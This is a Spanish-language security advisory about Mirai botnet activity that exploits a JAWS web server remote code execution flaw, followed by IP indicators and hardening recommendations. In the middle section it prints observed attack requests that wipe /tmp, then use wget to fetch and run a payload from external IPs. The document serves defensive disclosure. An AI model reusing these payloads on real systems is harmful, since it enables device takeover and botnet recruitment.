El siguiente informe tiene como objetivo la notificación de actividad relacionada a la Botnet “Mirai Botnet” la cual presenta actividad en múltiples servicios de internet, atacando principalmente servidores expuestos por el protocolo HTTP.
Mirai es una Botnet que infecta dispositivos inteligentes que funcionan con procesadores ARC, convirtiéndolos en una red de bots que pueden ser controlados remotamente para lanzar ataques distribuidos de denegación de servicio (DDoS), Mirai escanea las direcciones IP para identificar los dispositivos inteligentes que ejecutan una versión de Linux conocida como ARC.
En septiembre de 2016, los creadores del Malware Mirai lanzaron un ataque DDoS contra el sitio web de un conocido experto en seguridad. Una semana más tarde sacaron a la luz el código fuente, posiblemente para intentar ocultar los orígenes de ese ataque.
Una vez liberada, Mirai se convirtió en una bola de nieve fuera de control, ya que fue replicada y modificada por otros ciberdelincuentes.
El código fuente de la botnet Mirai, publicado en la dark web, sigue evolucionando debido a que los creadores de Malware lo adaptan para crear variantes más avanzadas de Mirai.
Las amenazas recientes de botnets de IoT, como Okiru, Satori y Reaper, se basan en el código fuente del Malware de Mirai.
El Malware Mirai escanea las direcciones IP para identificar los dispositivos inteligentes que ejecutan una versión de Linux conocida como ARC. Asimismo, aprovecha las vulnerabilidades de seguridad del dispositivo IoT para obtener acceso a la red a través de combinaciones predeterminadas de nombre de usuario y contraseña. Si estas configuraciones no se han cambiado o actualizado, Mirai puede iniciar sesión en el dispositivo e infectarlo con Malware.
A medida que aumenta el número de dispositivos atrapados en la red infectada, los ciberdelincuentes que la controlan utilizan las redes de bots Mirai para colapsar los sitios web o servidores objetivo bombardeándolos con más tráfico del que pueden soportar.
Mirai ha sido detectado por Cyberpeace realizando actividades maliciosas en la madrugada del 31 de agosto, y fue detectado por nuestras herramientas y equipo de trabajo, realizando posteriormente una investigación, relacionado a una vulnerabilidad de JAWS la cual si es explotada podría conducir a una ejecución de código remoto la cual se ha visualizado en peticiones HTTP solicitando recursos hacía direcciones IP maliciosas.
127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jaws 127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+121.62.21[.]23/jaws;sh+/tmp/jaws
127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+ 81.161.229[.]185/jaws;sh+/tmp/jaws
127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251[.]176/jaws;sh+/tmp/jaws
El comando se ejecuta en la misma maquina intentando cambiar el directorio actual a “/tmp” para después forzar para que sean borrados el contenido del directorio actual (“/tmp”) siguiendo con el análisis - **wget+94.158.247[.]123/jaws**; se utiliza para descargar archivos desde internet, realizando la solicitud HTTP a JAWS Remote Code Execution Exploit - HTTP, se trata de una ejecución remota de comandos en JAWS/1.0 web server desde la dirección ipv4 94.158.247.123 o como se ve relacionado con los comandos anteriores.
Las direcciones ip relacionadas son las siguientes:
222.222.180[.]202
94.158.247[.]123
145.253.127[.]199
81.161.229[.]185
116.33.128[.]116
121.62.21[.]23
178.175.161[.]103
113.65.131[.]103
212.8.251[.]176
223.13.125[.]214
Las cuales son IPs, que se recomienda agregar a dispositivos perimetrales para protección de la red administrada. Si encuentras este tipo de comandos en tu sistema, es importante tomar medidas de seguridad inmediatas, como aislar los equipos infectados de la infraestructura, escanear en busca de Malware, cambiar contraseñas y realizar un análisis exhaustivo en el servidor.
Recomendaciones sobre Mirai Botnet
Cambia contraseñas por defecto: Cambia las contraseñas predeterminadas de tus dispositivos dentro de la infraestructura, incluidos enrutadores, cámaras IP, impresoras, servidores, servidores con portales expuestos a internet, etc.
Actualiza regularmente: Mantén tus dispositivos actualizados con los últimos parches y firmware. Los fabricantes a menudo lanzan actualizaciones de seguridad para corregir vulnerabilidades conocidas.
Desactiva servicios innecesarios: Si un dispositivo tiene servicios o características que no necesitas, desactívalos. Esto reduce la superficie de ataque y disminuye las posibilidades de explotación.
Segmentación de red: Separa tus dispositivos en una red separada (VLAN) de tus dispositivos críticos. Esto limita la propagación de posibles infecciones y aísla los dispositivos comprometidos.
Firewall y filtrado de tráfico: Configura firewalls en tus dispositivos y redes para filtrar el tráfico no deseado y bloquear conexiones sospechosas.
Monitorización de tráfico: Utiliza herramientas de monitorización de red para detectar actividades anormales, como patrones de tráfico inusuales que podrían indicar un posible ataque.
Desactiva UPnP: Universal Plug and Play (UPnP) puede abrir puertas traseras no deseadas en dispositivos. Desactiva esta función a menos que sea absolutamente necesaria.
Apaga dispositivos no utilizados: Si no necesitas un dispositivo IoT en un momento determinado, apágalo. Esto reduce el tiempo de exposición a posibles amenazas.
Educación y concienciación: Educa a los usuarios sobre las mejores prácticas de seguridad cibernética para dispositivos y la importancia de mantenerse alerta frente a amenazas potenciales.
Colocar los indicadores de compromiso adjuntados en el archivo IOC’s.xlsx y en las herramientas de seguridad perimetral.
Commenti